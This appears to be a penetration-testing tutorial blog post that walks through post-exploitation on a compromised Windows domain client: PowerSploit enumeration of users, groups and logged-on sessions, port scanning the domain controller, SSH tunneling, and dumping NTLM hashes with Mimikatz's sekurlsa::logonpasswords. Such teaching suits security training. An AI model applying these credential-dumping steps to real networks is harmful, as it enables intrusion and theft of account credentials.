Introduction
Welcome back to my series on Active Directory penetration testing! In this session, I’m going to show you how to take a compromised Windows client that’s part of a domain and start dumping password hashes. Let’s get right into it.
Getting Started: From Shell to PowerShell
I’m starting from the assumption that I’ve already gained a basic shell on a Windows machine within the target network. The first thing I always do is jump from the standard command line into PowerShell. It’s an incredibly powerful tool and absolutely essential for anyone serious about Active Directory testing.
Once I’m in PowerShell, my next job is to get my toolkit onto the compromised system. I use a simple PowerShell command to download my files. My go-to collection of scripts is PowerSploit, which is a goldmine for penetration testers.
Reconnaissance: Mapping Out the Domain
With PowerSploit on the machine, I can start my reconnaissance. I’ll navigate to the recon
module within the PowerSploit directory, which is packed with scripts for system enumeration.
Before I can use any of these scripts, I need to import them. It’s a simple command: Import-Module
followed by the script’s name.
Here’s my typical enumeration workflow:
- Find the Domain: I start by getting the current domain name using
Get-NetDomain
. This gives me the forest name, the domain controllers, and the domain name itself. I always make sure to note this information down. - List the Users: Next, I use
Get-NetUser
to get a list of all the user accounts on the system. This command is great because it also shows me which groups each user belongs to. This is how I can spot high-value targets like administrators. - List the Groups: To get a bird’s-eye view of the group structure, I use
Get-NetGroup
. - Check Group Members: If I want to see who’s in a specific group, I use
Get-NetGroupMember
. For example, I can quickly check who’s in the “IT” or “HR” groups. - See Who’s Logged In: This is a crucial step. Knowing who is currently logged into a machine helps me focus my efforts. I use
Get-NetLoggedOn
to see who’s logged into the machine I’m on. If I want to check a different computer, I’ll first get a list of all computers in the domain withGet-NetComputer
and then use theComputerName
parameter.
Moving Laterally: Port Scanning and Tunneling
Once I have a good map of the network, I start thinking about lateral movement. A great way to do this is by scanning for open ports on the domain controller.
I use the Invoke-PortScan
module from PowerSploit for this. I just need to give it the hostname of the domain controller, and it will show me all the open ports. This can reveal services like HTTP, Remote Desktop, and NetBIOS, which are all potential avenues for attack.
After I’ve finished my enumeration, I like to set up an SSH tunnel between the compromised machine and my Kali Linux machine. This allows me to interact directly with the domain controller from Kali, which opens up a whole new world of tools and possibilities.
Dumping Hashes with Mimikatz
Now for the moment we’ve all been waiting for: dumping password hashes. For this, I use the legendary tool Mimikatz.
I navigate to the Mimikatz directory and run the executable. Before I do anything else, I need to make sure I have the right privileges. I do this by typing privilege::debug
.
Once my privileges are elevated, I can dump the hashes of all the currently logged-in users on the workstation with the command sekurlsa::logonpasswords
.
The output from this command is pure gold. It gives me the usernames and their corresponding NTLM and SHA1 hashes. I can then take these hashes offline and use a tool like John the Ripper to crack them.
Mimikatz can also be used to steal passwords using Kerberos tickets, but that’s a topic for another day!
I’ll be covering more advanced Active Directory penetration testing techniques in my future videos, so make sure you stay tuned!